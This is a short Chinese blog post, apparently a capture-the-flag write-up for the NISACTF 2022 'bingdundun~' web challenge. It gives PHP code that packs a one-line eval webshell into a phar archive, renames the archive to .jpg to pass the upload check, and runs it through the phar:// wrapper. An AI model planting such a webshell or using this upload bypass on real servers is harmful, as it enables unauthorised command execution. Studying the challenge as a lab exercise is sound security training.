Loading

NSS日刷-[NISACTF 2022]bingdundun~-phar

phar://是一种伪协议,个人感觉是用来打包的,可以用它获取打包的文件

 

注意url,类似文件包含,改成index试试

 

推测是再后面加上.php再进行文件读取

 

注意不仅能传图片也能传压缩包,我们目的是执行成php,这里用的phar进行打包

 <?php
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); 
    $phar->addFromString("exp.php", "<?php eval(\$_GET['1']);"); //添加要压缩的文件,有时候会用到读取这里面的
    $phar->stopBuffering();

注意我这里是将exp.php压缩到phar里面,上传phar发现报错

这里就要说一下phar协议来读取这个phar.phar,我们可以将它改成phar.jpg这个伪协议仍然可以解压,因为他不看后缀名,主要看标识来判定,我们可以改成任意后缀。

而我们压入的内容名字是exp.php,具体内容是一句话木马,改后缀上传成功后访问

 

前面是phar对生成的文件名来进行解码读取里面的exp.php文件,注意它会自动加上.php,访问exp即可

接下来就是命令执行了

 

posted @ 2022-07-03 20:12  Aninock  阅读(899)  评论(2编辑  收藏  举报